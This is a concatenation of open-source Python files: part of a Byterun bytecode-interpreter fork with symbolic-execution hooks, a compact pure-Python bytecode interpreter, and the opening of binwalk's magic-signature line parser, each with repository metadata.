delattr(obj, name)
def byte_STORE_SUBSCR(self):
val, obj, subscr = self.popn(3)
obj[subscr] = val
def byte_DELETE_SUBSCR(self):
obj, subscr = self.popn(2)
del obj[subscr]
## Building
def byte_BUILD_TUPLE(self, count):
elts = self.popn(count)
self.push(tuple(elts))
def byte_BUILD_LIST(self, count):
elts = self.popn(count)
self.push(elts)
def byte_BUILD_SET(self, count):
# TODO: Not documented in Py2 docs.
elts = self.popn(count)
self.push(set(elts))
def byte_BUILD_MAP(self, size):
# size is ignored.
self.push({})
def byte_STORE_MAP(self):
the_map, val, key = self.popn(3)
the_map[key] = val
self.push(the_map)
def byte_UNPACK_SEQUENCE(self, count):
seq = self.pop()
for x in reversed(seq):
self.push(x)
def byte_BUILD_SLICE(self, count):
if count == 2:
x, y = self.popn(2)
self.push(slice(x, y))
elif count == 3:
x, y, z = self.popn(3)
self.push(slice(x, y, z))
else: # pragma: no cover
raise VirtualMachineError("Strange BUILD_SLICE count: %r" % count)
def byte_LIST_APPEND(self, count):
val = self.pop()
the_list = self.peek(count)
the_list.append(val)
def byte_SET_ADD(self, count):
val = self.pop()
the_set = self.peek(count)
the_set.add(val)
def byte_MAP_ADD(self, count):
val, key = self.popn(2)
the_map = self.peek(count)
the_map[key] = val
## Printing
if 0: # Only used in the interactive interpreter, not in modules.
def byte_PRINT_EXPR(self):
print(self.pop())
def byte_PRINT_ITEM(self):
item = self.pop()
self.print_item(item)
def byte_PRINT_ITEM_TO(self):
to = self.pop()
item = self.pop()
self.print_item(item, to)
def byte_PRINT_NEWLINE(self):
self.print_newline()
def byte_PRINT_NEWLINE_TO(self):
to = self.pop()
self.print_newline(to)
def print_item(self, item, to=None):
if to is None:
to = sys.stdout
if to.softspace:
print(" ", end="", file=to)
to.softspace = 0
print(item, end="", file=to)
if isinstance(item, str):
if (not item) or (not item[-1].isspace()) or (item[-1] == " "):
to.softspace = 1
else:
to.softspace = 1
def print_newline(self, to=None):
if to is None:
to = sys.stdout
print("", file=to)
to.softspace = 0
## Jumps
def byte_JUMP_FORWARD(self, jump):
self.jump(jump)
def byte_JUMP_ABSOLUTE(self, jump):
self.jump(jump)
if 0: # Not in py2.7
def byte_JUMP_IF_TRUE(self, jump):
val = self.top()
if val:
self.jump(jump)
def byte_JUMP_IF_FALSE(self, jump):
val = self.top()
if not val:
self.jump(jump)
def byte_POP_JUMP_IF_TRUE_SYM(self, jump):
val = self.pop()
if isinstance(val, symex.SymbolicVar):
branch_cond = self.cur_interesting_path.pop(0)[1]
if branch_cond == 'TRUE':
val.isTrue()
self.jump(jump)
elif branch_cond == 'FALSE':
val.isFalse()
else:
import ipdb
ipdb.set_trace()
pass
else:
if val:
self.jump(jump)
def byte_POP_JUMP_IF_TRUE(self, jump):
if self.symbolic_on:
self.byte_POP_JUMP_IF_TRUE_SYM(jump)
else:
val = self.pop()
if val:
self.jump(jump)
def byte_POP_JUMP_IF_FALSE_SYM(self, jump):
val = self.pop()
if isinstance(val, symex.SymbolicVar):
branch_cond = self.cur_interesting_path.pop(0)[1]
if branch_cond == 'TRUE':
val.isTrue()
elif branch_cond == 'FALSE':
val.isFalse()
self.jump(jump)
else:
import ipdb
ipdb.set_trace()
pass
else:
if not val:
self.jump(jump)
def byte_POP_JUMP_IF_FALSE(self, jump):
if self.symbolic_on:
self.byte_POP_JUMP_IF_FALSE_SYM(jump)
else:
val = self.pop()
if not val:
self.jump(jump)
def byte_JUMP_IF_TRUE_OR_POP(self, jump):
val = self.top()
if val:
self.jump(jump)
else:
self.pop()
def byte_JUMP_IF_FALSE_OR_POP(self, jump):
val = self.top()
if not val:
self.jump(jump)
else:
self.pop()
## Blocks
def byte_SETUP_LOOP(self, dest):
self.push_block('loop', dest)
def byte_GET_ITER(self):
self.push(iter(self.pop()))
def byte_FOR_ITER(self, jump):
iterobj = self.top()
try:
v = next(iterobj)
self.push(v)
except StopIteration:
self.pop()
self.jump(jump)
def byte_BREAK_LOOP(self):
return 'break'
def byte_CONTINUE_LOOP(self, dest):
# This is a trick with the return value.
# While unrolling blocks, continue and return both have to preserve
# state as the finally blocks are executed. For continue, it's
# where to jump to, for return, it's the value to return. It gets
# pushed on the stack for both, so continue puts the jump destination
# into return_value.
self.return_value = dest
return 'continue'
def byte_SETUP_EXCEPT(self, dest):
self.push_block('setup-except', dest)
def byte_SETUP_FINALLY(self, dest):
self.push_block('finally', dest)
def byte_END_FINALLY(self):
v = self.pop()
if isinstance(v, str):
why = v
if why in ('return', 'continue'):
self.return_value = self.pop()
if why == 'silenced': # PY3
block = self.pop_block()
assert block.type == 'except-handler'
self.unwind_block(block)
why = None
elif v is None:
why = None
elif issubclass(v, BaseException):
exctype = v
val = self.pop()
tb = self.pop()
self.last_exception = (exctype, val, tb)
why = 'reraise'
else: # pragma: no cover
raise VirtualMachineError("Confused END_FINALLY")
return why
def byte_POP_BLOCK(self):
self.pop_block()
if PY2:
def byte_RAISE_VARARGS(self, argc):
# NOTE: the dis docs are completely wrong about the order of the
# operands on the stack!
exctype = val = tb = None
if argc == 0:
exctype, val, tb = self.last_exception
elif argc == 1:
exctype = self.pop()
elif argc == 2:
val = self.pop()
exctype = self.pop()
elif argc == 3:
tb = self.pop()
val = self.pop()
exctype = self.pop()
# There are a number of forms of "raise", normalize them somewhat.
if isinstance(exctype, BaseException):
val = exctype
exctype = type(val)
self.last_exception = (exctype, val, tb)
if tb:
return 'reraise'
else:
return 'exception'
elif PY3:
def byte_RAISE_VARARGS(self, argc):
cause = exc = None
if argc == 2:
cause = self.pop()
exc = self.pop()
elif argc == 1:
exc = self.pop()
return self.do_raise(exc, cause)
def do_raise(self, exc, cause):
if exc is None: # reraise
exc_type, val, tb = self.last_exception
if exc_type is None:
return 'exception' # error
else:
return 'reraise'
elif type(exc) == type:
# As in `raise ValueError`
exc_type = exc
val = exc() # Make an instance.
elif isinstance(exc, BaseException):
# As in `raise ValueError('foo')`
exc_type = type(exc)
val = exc
else:
return 'exception' # error
# If you reach this point, you're guaranteed that
# val is a valid exception instance and exc_type is its class.
# Now do a similar thing for the cause, if present.
if cause:
if type(cause) == type:
cause = cause()
elif not isinstance(cause, BaseException):
return 'exception' # error
val.__cause__ = cause
self.last_exception = exc_type, val, val.__traceback__
return 'exception'
def byte_POP_EXCEPT(self):
block = self.pop_block()
if block.type != 'except-handler':
raise Exception("popped block is not an except handler")
self.unwind_block(block)
def byte_SETUP_WITH(self, dest):
ctxmgr = self.pop()
self.push(ctxmgr.__exit__)
ctxmgr_obj = ctxmgr.__enter__()
if PY2:
self.push_block('with', dest)
elif PY3:
self.push_block('finally', dest)
self.push(ctxmgr_obj)
def byte_WITH_CLEANUP(self):
# The code here does some weird stack manipulation: the exit function
# is buried in the stack, and where depends on what's on top of it.
# Pull out the exit function, and leave the rest in place.
v = w = None
u = self.top()
if u is None:
exit_func = self.pop(1)
elif isinstance(u, str):
if u in ('return', 'continue'):
exit_func = self.pop(2)
else:
exit_func = self.pop(1)
u = None
elif issubclass(u, BaseException):
if PY2:
w, v, u = self.popn(3)
exit_func = self.pop()
self.push(w, v, u)
elif PY3:
w, v, u = self.popn(3)
tp, exc, tb = self.popn(3)
exit_func = self.pop()
self.push(tp, exc, tb)
self.push(None)
self.push(w, v, u)
block = self.pop_block()
assert block.type == 'except-handler'
self.push_block(block.type, block.handler, block.level-1)
else: # pragma: no cover
raise VirtualMachineError("Confused WITH_CLEANUP")
exit_ret = exit_func(u, v, w)
err = (u is not None) and bool(exit_ret)
if err:
# An error occurred, and was suppressed
if PY2:
self.popn(3)
self.push(None)
elif PY3:
self.push('silenced')
## Functions
def byte_MAKE_FUNCTION(self, argc):
if PY3:
name = self.pop()
else:
name = None
code = self.pop()
defaults = self.popn(argc)
globs = self.frame.f_globals
fn = Function(name, code, globs, defaults, None, self)
self.push(fn)
def byte_LOAD_CLOSURE(self, name):
self.push(self.frame.cells[name])
def byte_MAKE_CLOSURE(self, argc):
if PY3:
# TODO: the py3 docs don't mention this change.
name = self.pop()
else:
name = None
closure, code = self.popn(2)
defaults = self.popn(argc)
globs = self.frame.f_globals
fn = Function(name, code, globs, defaults, closure, self)
self.push(fn)
def byte_CALL_FUNCTION(self, arg):
return self.call_function(arg, [], {})
def byte_CALL_FUNCTION_VAR(self, arg):
args = self.pop()
return self.call_function(arg, args, {})
def byte_CALL_FUNCTION_KW(self, arg):
kwargs = self.pop()
return self.call_function(arg, [], kwargs)
def byte_CALL_FUNCTION_VAR_KW(self, arg):
args, kwargs = self.popn(2)
return self.call_function(arg, args, kwargs)
def call_function(self, arg, args, kwargs):
lenKw, lenPos = divmod(arg, 256)
namedargs = {}
for i in range(lenKw):
key, val = self.popn(2)
namedargs[key] = val
namedargs.update(kwargs)
posargs = self.popn(lenPos)
posargs.extend(args)
func = self.pop()
frame = self.frame
ffunc = func
if hasattr(func, 'im_func'):
# Methods get self as an implicit first parameter.
if func.im_self:
posargs.insert(0, func.im_self)
# The first parameter must be the correct type.
if not isinstance(posargs[0], func.im_class):
raise TypeError(
'unbound method %s() must be called with %s instance '
'as first argument (got %s instance instead)' % (
func.im_func.func_name,
func.im_class.__name__,
type(posargs[0]).__name__,
)
)
func = func.im_func
if self.symbolic_on:
if isinstance(func, Function):
func = func._func
if not hasattr(func, 'func_code'):
import ipdb
ipdb.set_trace()
retval = func(*posargs, **namedargs)
elif func.func_code in self.interesting_paths:
import ipdb
ipdb.set_trace()
# setup env from posargs and namedargs
decl = self.get_decl(func.func_code)
env = self.get_env(decl.parent_module.code_object)
func_args = inspect.getargspec(func)
argnames = func_args.args[:]
posargs_copy = posargs[:]
namedargs_copy = namedargs.copy()
defaults = func_args.defaults
defaults_copy = list(defaults) if defaults is not None else None
for name, var in zip(func_args.args, posargs):
env[name] = var
argnames.pop(0)
posargs_copy.pop(0)
# if all posargs were used up, use kwargs
for argname in argnames:
if argname in namedargs:
env[argname] = namedargs[argname]
namedargs_copy.pop(argname)
else:
env[argname] = defaults_copy.pop(0)
if func_args.varargs:
env[func_args.varargs] = []
for var in posargs_copy:
env[func_args.varargs].append(var)
if func_args.keywords:
env[func_args.keywords] = {}
for name, val in namedargs_copy.iteritems():
env[func_args.keywords][name] = val
# XXX(soh): handles closure
closures = func.func_closure or []
for closure in closures:
import ipdb
ipdb.set_trace()
cell_contents = closure.cell_contents
if not self.frame.cells:
self.frame.cells = {}
for var in func.func_code.co_freevars:
cell = Cell(cell_contents)
self.frame.cells[var] = cell
import ipdb
ipdb.set_trace()
retval = self.fork(func.func_code, f_globals=env)
else:
retval = func(*posargs, **namedargs)
else:
retval = func(*posargs, **namedargs)
self.push(retval)
def byte_RETURN_VALUE(self):
self.return_value = self.pop()
if self.frame.generator:
self.frame.generator.finished = True
return "return"
def byte_YIELD_VALUE(self):
self.return_value = self.pop()
return "yield"
def byte_YIELD_FROM(self):
u = self.pop()
x = self.top()
try:
if not isinstance(x, Generator) or u is None:
# Call next on iterators.
retval = next(x)
else:
retval = x.send(u)
self.return_value = retval
except StopIteration as e:
self.pop()
self.push(e.value)
else:
# YIELD_FROM decrements f_lasti, so that it will be called
# repeatedly until a StopIteration is raised.
self.jump(self.frame.f_lasti - 1)
# Returning "yield" prevents the block stack cleanup code
# from executing, suspending the frame in its current state.
return "yield"
## Importing
def byte_IMPORT_NAME(self, name):
level, fromlist = self.popn(2)
frame = self.frame
self.push(
__import__(name, frame.f_globals, frame.f_locals, fromlist, level)
)
def byte_IMPORT_STAR(self):
# TODO: this doesn't use __all__ properly.
mod = self.pop()
for attr in dir(mod):
if attr[0] != '_':
self.frame.f_locals[attr] = getattr(mod, attr)
def byte_IMPORT_FROM(self, name):
mod = self.top()
self.push(getattr(mod, name))
## And the rest...
def byte_EXEC_STMT(self):
stmt, globs, locs = self.popn(3)
six.exec_(stmt, globs, locs)
if PY2:
def byte_BUILD_CLASS(self):
name, bases, methods = self.popn(3)
self.push(type(name, bases, methods))
elif PY3:
def byte_LOAD_BUILD_CLASS(self):
# New in py3
self.push(__build_class__)
def byte_STORE_LOCALS(self):
self.frame.f_locals = self.pop()
if 0: # Not in py2.7
def byte_SET_LINENO(self, lineno):
self.frame.f_lineno = lineno
| {
"repo_name": "sukwon0709/byterun",
"path": "byterun/pyvm2.py",
"copies": "1",
"size": "37105",
"license": "mit",
"hash": -8876592344558702000,
"line_mean": 30.1806722689,
"line_max": 90,
"alpha_frac": 0.5074787764,
"autogenerated": false,
"ratio": 3.861885928393006,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.986420818112502,
"avg_score": 0.0010313047335972765,
"num_lines": 1190
} |
"""A pure-Python Python bytecode interpreter."""
# Derived from Byterun by Ned Batchelder, based on pyvm2 by Paul
# Swartz (z3p), from http://www.twistedmatrix.com/users/z3p/
import builtins, dis, operator, types
class Function:
__slots__ = [
'__name__', '__code__', '__globals__', '__defaults__', '__closure__',
'__dict__', '__doc__',
]
def __init__(self, name, code, globs, defaults, closure):
self.__name__ = name or code.co_name
self.__code__ = code
self.__globals__ = globs
self.__defaults__ = tuple(defaults)
self.__closure__ = closure
self.__dict__ = {}
self.__doc__ = code.co_consts[0] if code.co_consts else None
def __repr__(self): # pragma: no cover
return '<Function %s at 0x%08x>' % (self.__name__, id(self))
def __get__(self, instance, owner):
return self if instance is None else Method(instance, owner, self)
def __call__(self, *args, **kwargs):
code = self.__code__
argc = code.co_argcount
varargs = 0 != (code.co_flags & 0x04)
varkws = 0 != (code.co_flags & 0x08)
params = code.co_varnames[slice(0, argc+varargs+varkws)]
defaults = self.__defaults__
nrequired = -len(defaults) if defaults else argc
f_locals = dict(zip(params[slice(nrequired, None)], defaults))
f_locals.update(dict(zip(params, args)))
if varargs:
f_locals[params[argc]] = args[slice(argc, None)]
elif argc < len(args):
raise TypeError("%s() takes up to %d positional argument(s) but got %d"
% (self.__name__, argc, len(args)))
if varkws:
f_locals[params[-1]] = varkw_dict = {}
for kw, value in kwargs.items():
if kw in params:
f_locals[kw] = value
elif varkws:
varkw_dict[kw] = value
else:
raise TypeError("%s() got an unexpected keyword argument %r"
% (self.__name__, kw))
missing = [v for v in params[slice(0, nrequired)] if v not in f_locals]
if missing:
raise TypeError("%s() missing %d required positional argument%s: %s"
% (code.co_name,
len(missing), 's' if 1 < len(missing) else '',
', '.join(map(repr, missing))))
return run_frame(code, self.__closure__, self.__globals__, f_locals)
class Method:
def __init__(self, obj, _class, func):
self.__self__ = obj
self._class = _class
self.__func__ = func
def __repr__(self): # pragma: no cover
name = "%s.%s" % (self._class.__name__, self.__func__.__name__)
return '<bound method %s of %s>' % (name, self.__self__)
def __call__(self, *args, **kwargs):
return self.__func__(self.__self__, *args, **kwargs)
class Cell:
def __init__(self, value):
self.contents = value
class VirtualMachineError(Exception):
"For raising errors in the operation of the VM."
def run(code, f_globals, f_locals):
if f_globals is None: f_globals = builtins.globals()
if f_locals is None: f_locals = f_globals
if '__builtins__' not in f_globals:
f_globals['__builtins__'] = builtins.__dict__
return run_frame(code, None, f_globals, f_locals)
def run_frame(code, f_closure, f_globals, f_locals):
return Frame(code, f_closure, f_globals, f_locals).run()
class Frame:
def __init__(self, f_code, f_closure, f_globals, f_locals):
self.f_code = f_code
self.f_globals = f_globals
self.f_locals = f_locals
self.f_builtins = f_globals.get('__builtins__')
if isinstance(self.f_builtins, types.ModuleType):
self.f_builtins = self.f_builtins.__dict__
if self.f_builtins is None:
self.f_builtins = {'None': None}
self.stack = []
self.f_lineno = f_code.co_firstlineno # XXX doesn't get updated
self.f_lasti = 0
self.cells = {} if f_code.co_cellvars or f_code.co_freevars else None
for var in f_code.co_cellvars:
self.cells[var] = Cell(self.f_locals.get(var))
if f_code.co_freevars:
assert len(f_code.co_freevars) == len(f_closure)
self.cells.update(zip(f_code.co_freevars, f_closure))
def __repr__(self): # pragma: no cover
return ('<Frame at 0x%08x: %r @ %d>'
% (id(self), self.f_code.co_filename, self.f_lineno))
def run(self):
while True:
byte_name, arguments = self.parse_byte_and_args()
outcome = self.dispatch(byte_name, arguments)
if outcome:
assert outcome == 'return'
return self.pop()
def parse_byte_and_args(self):
code = self.f_code
opcode = code.co_code[self.f_lasti]
self.f_lasti = self.f_lasti + 1
if opcode >= dis.HAVE_ARGUMENT:
int_arg = ( code.co_code[self.f_lasti]
+ (code.co_code[self.f_lasti+1] << 8))
self.f_lasti = self.f_lasti + 2
if opcode in dis.hasconst:
arg = code.co_consts[int_arg]
elif opcode in dis.hasfree:
if int_arg < len(code.co_cellvars):
arg = code.co_cellvars[int_arg]
else:
arg = code.co_freevars[int_arg - len(code.co_cellvars)]
elif opcode in dis.hasname:
arg = code.co_names[int_arg]
elif opcode in dis.haslocal:
arg = code.co_varnames[int_arg]
elif opcode in dis.hasjrel:
arg = self.f_lasti + int_arg
else:
arg = int_arg
return dis.opname[opcode], (arg,)
return dis.opname[opcode], ()
def dispatch(self, byte_name, arguments):
if byte_name.startswith('UNARY_'):
self.unary_operator(byte_name.replace('UNARY_', '', 1))
elif byte_name.startswith('BINARY_'):
self.binary_operator(byte_name.replace('BINARY_', '', 1))
else:
return getattr(self, 'byte_%s' % byte_name)(*arguments)
def top(self):
return self.stack[-1]
def push(self, val):
self.stack.append(val)
def pop(self):
return self.stack.pop()
def popn(self, n):
vals = [self.stack.pop() for _ in range(n)]
vals.reverse()
return vals
def jump(self, jump):
self.f_lasti = jump
def byte_POP_TOP(self):
self.pop()
def byte_DUP_TOP(self):
self.push(self.top())
def byte_LOAD_CONST(self, const):
self.push(const)
def byte_LOAD_GLOBAL(self, name): # XXX not used by the compiler; just for comparison runs
if name in self.f_globals: val = self.f_globals[name]
elif name in self.f_builtins: val = self.f_builtins[name]
else: raise NameError("name '%s' is not defined" % name)
self.push(val)
def byte_LOAD_NAME(self, name):
if name in self.f_locals: val = self.f_locals[name]
elif name in self.f_globals: val = self.f_globals[name]
elif name in self.f_builtins: val = self.f_builtins[name]
else: raise NameError("name '%s' is not defined" % name)
self.push(val)
def byte_STORE_NAME(self, name):
self.f_locals[name] = self.pop()
def byte_LOAD_FAST(self, name):
if name not in self.f_locals:
raise UnboundLocalError(
"local variable '%s' referenced before assignment" % name)
self.push(self.f_locals[name])
def byte_STORE_FAST(self, name):
self.f_locals[name] = self.pop()
def byte_LOAD_DEREF(self, name):
self.push(self.cells[name].contents)
def byte_STORE_DEREF(self, name):
self.cells[name].contents = self.pop()
UNARY_OPERATORS = {
'POSITIVE': operator.pos, 'NOT': operator.not_,
'NEGATIVE': operator.neg, 'INVERT': operator.invert,
}
def unary_operator(self, op):
x = self.pop()
self.push(self.UNARY_OPERATORS[op](x))
BINARY_OPERATORS = {
'POWER': pow, 'ADD': operator.add,
'LSHIFT': operator.lshift, 'SUBTRACT': operator.sub,
'RSHIFT': operator.rshift, 'MULTIPLY': operator.mul,
'OR': operator.or_, 'MODULO': operator.mod,
'AND': operator.and_, 'TRUE_DIVIDE': operator.truediv,
'XOR': operator.xor, 'FLOOR_DIVIDE': operator.floordiv,
'SUBSCR': operator.getitem,
}
def binary_operator(self, op):
x, y = self.popn(2)
self.push(self.BINARY_OPERATORS[op](x, y))
COMPARE_OPERATORS = [
operator.lt,
operator.le,
operator.eq,
operator.ne,
operator.gt,
operator.ge,
lambda x, y: x in y,
lambda x, y: x not in y,
lambda x, y: x is y,
lambda x, y: x is not y,
lambda x, y: issubclass(x, Exception) and issubclass(x, y),
]
def byte_COMPARE_OP(self, opnum):
x, y = self.popn(2)
self.push(self.COMPARE_OPERATORS[opnum](x, y))
def byte_LOAD_ATTR(self, attr):
obj = self.pop()
val = getattr(obj, attr)
self.push(val)
def byte_STORE_ATTR(self, name):
val, obj = self.popn(2)
setattr(obj, name, val)
def byte_STORE_SUBSCR(self):
val, obj, subscr = self.popn(3)
obj[subscr] = val
def byte_BUILD_TUPLE(self, count):
self.push(tuple(self.popn(count)))
def byte_BUILD_LIST(self, count):
self.push(self.popn(count))
def byte_BUILD_MAP(self, size):
self.push({})
def byte_STORE_MAP(self):
the_map, val, key = self.popn(3)
the_map[key] = val
self.push(the_map)
def byte_UNPACK_SEQUENCE(self, count):
seq = self.pop()
for x in reversed(seq):
self.push(x)
def byte_LIST_APPEND(self, count):
val = self.pop()
self.stack[-count].append(val)
def byte_JUMP_FORWARD(self, jump):
self.jump(jump)
def byte_JUMP_ABSOLUTE(self, jump):
self.jump(jump)
def byte_POP_JUMP_IF_TRUE(self, jump): # XXX not emitted by the compiler
val = self.pop()
if val:
self.jump(jump)
def byte_POP_JUMP_IF_FALSE(self, jump):
val = self.pop()
if not val:
self.jump(jump)
def byte_JUMP_IF_TRUE_OR_POP(self, jump):
if self.top():
self.jump(jump)
else:
self.pop()
def byte_JUMP_IF_FALSE_OR_POP(self, jump):
if not self.top():
self.jump(jump)
else:
self.pop()
def byte_SETUP_LOOP(self, dest):
pass
def byte_GET_ITER(self):
self.push(iter(self.pop()))
def byte_FOR_ITER(self, jump):
void = object()
element = next(self.top(), void)
if element is void:
self.pop()
self.jump(jump)
else:
self.push(element)
def byte_POP_BLOCK(self):
pass
def byte_RAISE_VARARGS(self, argc):
assert argc == 1
raise self.pop()
def byte_MAKE_FUNCTION(self, argc):
name = self.pop()
code = self.pop()
defaults = self.popn(argc)
self.push(Function(name, code, self.f_globals, defaults, None))
def byte_LOAD_CLOSURE(self, name):
self.push(self.cells[name])
def byte_MAKE_CLOSURE(self, argc):
name = self.pop()
closure, code = self.popn(2)
defaults = self.popn(argc)
globs = self.f_globals
self.push(Function(name, code, globs, defaults, closure))
def byte_CALL_FUNCTION(self, arg):
return self.call_function(arg, [], {})
def byte_CALL_FUNCTION_VAR(self, arg):
varargs = self.pop()
return self.call_function(arg, varargs, {})
def byte_CALL_FUNCTION_KW(self, arg):
kwargs = self.pop()
return self.call_function(arg, [], kwargs)
def byte_CALL_FUNCTION_VAR_KW(self, arg):
varargs, kwargs = self.popn(2)
return self.call_function(arg, varargs, kwargs)
def call_function(self, oparg, varargs, kwargs):
len_kw, len_pos = divmod(oparg, 256)
namedargs = dict([self.popn(2) for i in range(len_kw)])
namedargs.update(kwargs)
posargs = self.popn(len_pos)
posargs.extend(varargs)
func = self.pop()
self.push(func(*posargs, **namedargs))
def byte_RETURN_VALUE(self):
return 'return'
def byte_IMPORT_NAME(self, name):
# XXX ceval.c is slightly different: looks up '__import__' in f_builtins first
level, fromlist = self.popn(2)
val = __import__(name, self.f_globals, self.f_locals, fromlist, level)
self.push(val)
def byte_IMPORT_FROM(self, name):
# XXX ceval.c is slightly different: turns AttributeError into ImportError
self.push(getattr(self.top(), name))
def byte_LOAD_BUILD_CLASS(self):
self.push(build_class)
def build_class(func, name, *bases, **kwds):
if not isinstance(func, Function):
raise TypeError("func must be a function")
if not isinstance(name, str):
raise TypeError("name is not a string")
metaclass = kwds.pop('metaclass', None)
if metaclass is None:
metaclass = type(bases[0]) if bases else type
if isinstance(metaclass, type):
metaclass = calculate_metaclass(metaclass, bases)
void = object()
prepare = getattr(metaclass, '__prepare__', void)
namespace = {} if prepare is void else prepare(name, bases, **kwds)
cell = run_frame(func.__code__, func.__closure__,
func.__globals__, namespace)
cls = metaclass(name, bases, namespace)
if isinstance(cell, Cell):
cell.contents = cls
return cls
def calculate_metaclass(metaclass, bases):
winner = metaclass
for base in bases:
t = type(base)
if issubclass(t, winner):
winner = t
elif not issubclass(winner, t):
raise TypeError("metaclass conflict", winner, t)
return winner
| {
"repo_name": "darius/tailbiter",
"path": "byterun/interpreter.py",
"copies": "1",
"size": "14299",
"license": "mit",
"hash": -568898643610571900,
"line_mean": 31.8712643678,
"line_max": 94,
"alpha_frac": 0.5561228058,
"autogenerated": false,
"ratio": 3.5393564356435645,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9585294386630194,
"avg_score": 0.0020369709626740767,
"num_lines": 435
} |
# A pure Python replacement for libmagic. Supports most libmagic features, plus
# several additional features not provided by libmagic. Tailored specifically
# for quickly searching blocks of data for multiple embedded signatures.
__all__ = ['Magic']
import re
import struct
import datetime
import binwalk.core.common
import binwalk.core.compat
from binwalk.core.exceptions import ParserException
class SignatureResult(binwalk.core.module.Result):
'''
Container class for signature results.
'''
def __init__(self, **kwargs):
# These are set by signature keyword tags.
# Keyword tags can also set any other object attributes,
# including those in binwalk.core.module.Result.
self.jump = 0
self.many = False
self.adjust = 0
self.strlen = 0
self.string = False
self.invalid = False
self.once = False
self.overlap = False
# These are set by code internally
self.id = 0
# Kwargs overrides the defaults set above
super(self.__class__, self).__init__(**kwargs)
self.valid = (not self.invalid)
class SignatureLine(object):
'''
Responsible for parsing signature lines from magic signature files.
'''
# Printed strings are truncated to this size
MAX_STRING_SIZE = 128
def __init__(self, line):
'''
Class constructor. Responsible for parsing a line from a signature file.
@line - A line of text from the signature file.
Returns None.
'''
self.tags = {}
self.text = line
self.regex = False
# Split the line on any white space; for this to work, backslash-escaped
# spaces ('\ ') are replaced with their escaped hex value ('\x20').
#
# [offset] [data type] [comparison value] [format string]
# 0 belong 0x12345678 Foo file type,
# >4 string x file name: %s,
parts = line.replace('\\ ', '\\x20').split(None, 3)
# Sanity check on the split line
if len(parts) not in [3, 4]:
raise ParserException("Invalid signature line: '%s'" % line)
# The indentation level is determined by the number of '>' characters at
# the beginning of the signature line.
self.level = parts[0].count('>')
# Get rid of the indentation characters and try to convert the remaining
# characters to an integer offset. This will fail if the offset is a complex
# value (e.g., '(4.l+16)').
self.offset = parts[0].replace('>', '')
try:
self.offset = int(self.offset, 0)
except ValueError as e:
pass
# self.type is the specified data type ('belong', 'string', etc)
self.type = parts[1]
self.opvalue = None
self.operator = None
# Each data type can specify an additional operation to be performed on the
# data being scanned before performing a comparison (e.g., 'belong&0xFF' will
# AND the data with 0xFF before the comparison is performed).
#
# We support the following operators:
for operator in ['&', '|', '*', '+', '-', '/', '~', '^']:
# Look for each operator in self.type
if operator in self.type:
# If found, split self.type into the type and operator value
(self.type, self.opvalue) = self.type.split(operator, 1)
# Keep a record of the specified operator
self.operator = operator
# Try to convert the operator value into an integer. This works for
# simple operator values, but not for complex types (e.g.,
# '(4.l+12)').
try:
self.opvalue = int(self.opvalue, 0)
except ValueError as e:
pass
# Only one operator type is supported, so break as soon as one
# is found
break
# If the specified type starts with 'u' (e.g., 'ubelong'), then it is
# unsigned; else, it is signed
if self.type[0] == 'u':
self.signed = False
self.type = self.type[1:]
else:
self.signed = True
# Big endian values start with 'be' ('belong'), little endian values start with 'le' ('lelong').
# The struct module uses '>' to denote big endian and '<' to denote
# little endian.
if self.type.startswith('be'):
self.type = self.type[2:]
self.endianess = '>'
elif self.type.startswith('le'):
self.endianess = '<'
self.type = self.type[2:]
# Assume big endian if no endianess was explicitly specified
else:
self.endianess = '>'
# Check the comparison value for the type of comparison to be performed (e.g.,
# '=0x1234', '>0x1234', etc). If no operator is specified, '=' is implied.
if parts[2][0] in ['=', '!', '>', '<', '&', '|', '^', '~']:
self.condition = parts[2][0]
self.value = parts[2][1:]
else:
self.condition = '='
self.value = parts[2]
# If this is a wildcard value, explicitly set self.value to None
if self.value == 'x':
self.value = None
# String values need to be decoded, as they may contain escape
# characters (e.g., '\x20')
elif self.type == 'string':
# String types support multiplication to easily match large
# repeating byte sequences
if '*' in self.value:
try:
p = self.value.split('*')
self.value = p[0]
for n in p[1:]:
self.value *= int(n, 0)
except KeyboardInterrupt as e:
raise e
except Exception as e:
raise ParserException(
"Failed to expand string '%s' with integer '%s' in line '%s'" % (self.value, n, line))
try:
self.value = binwalk.core.compat.string_decode(self.value)
except ValueError as e:
raise ParserException(
"Failed to decode string value '%s' in line '%s'" % (self.value, line))
# If a regex was specified, compile it
elif self.type == 'regex':
self.regex = True
try:
self.value = re.compile(self.value)
except KeyboardInterrupt as e:
raise e
except Exception as e:
raise ParserException(
"Invalid regular expression '%s': %s" % (self.value, str(e)))
# Non-string types are integer values
else:
try:
self.value = int(self.value, 0)
except ValueError as e:
raise ParserException(
"Failed to convert value '%s' to an integer on line '%s'" % (self.value, line))
# Sanity check to make sure the first line of a signature has an
# explicit value
if self.level == 0 and self.value is None:
raise ParserException(
"First element of a signature must specify a non-wildcard value: '%s'" % (line))
# Set the size and struct format value for the specified data type.
# This must be done, obviously, after the value has been parsed out
# above.
if self.type == 'string':
# Strings don't have a struct format value, since they don't have
# to be unpacked
self.fmt = None
# If a string type has a specific value, set the comparison size to
# the length of that string
if self.value:
self.size = len(self.value)
# Else, truncate the string to self.MAX_STRING_SIZE
else:
self.size = self.MAX_STRING_SIZE
elif self.type == 'regex':
# Regular expressions don't have a struct format value, since they
# don't have to be unpacked
self.fmt = None
# The size of a matching regex is unknown until it is applied to
# some data
self.size = self.MAX_STRING_SIZE
elif self.type == 'byte':
self.fmt = 'b'
self.size = 1
elif self.type == 'short':
self.fmt = 'h'
self.size = 2
elif self.type == 'quad':
self.fmt = 'q'
self.size = 8
# Assume 4 byte length for all other supported data types
elif self.type in ['long', 'date']:
self.fmt = 'i'
self.size = 4
else:
raise ParserException(
"Unknown data type '%s' in line '%s'" % (self.type, line))
# The struct module uses the same characters for specifying signed and unsigned data types,
# except that signed data types are upper case. The above if-else code sets self.fmt to the
# lower case (unsigned) values.
if not self.signed:
self.fmt = self.fmt.upper()
# If a struct format was identified, create a format string to be passed to struct.unpack
# which specifies the endianess and data type format.
if self.fmt:
self.pkfmt = '%c%c' % (self.endianess, self.fmt)
else:
self.pkfmt = None
# Check if a format string was specified (this is optional)
if len(parts) == 4:
# %lld formats are only supported if Python was built with HAVE_LONG_LONG
self.format = parts[3].replace('%ll', '%l')
# Regex to parse out tags, which are contained within curly braces
retag = re.compile(r'\{.*?\}')
# Parse out tag keywords from the format string
for match in retag.finditer(self.format):
# Get rid of the curly braces.
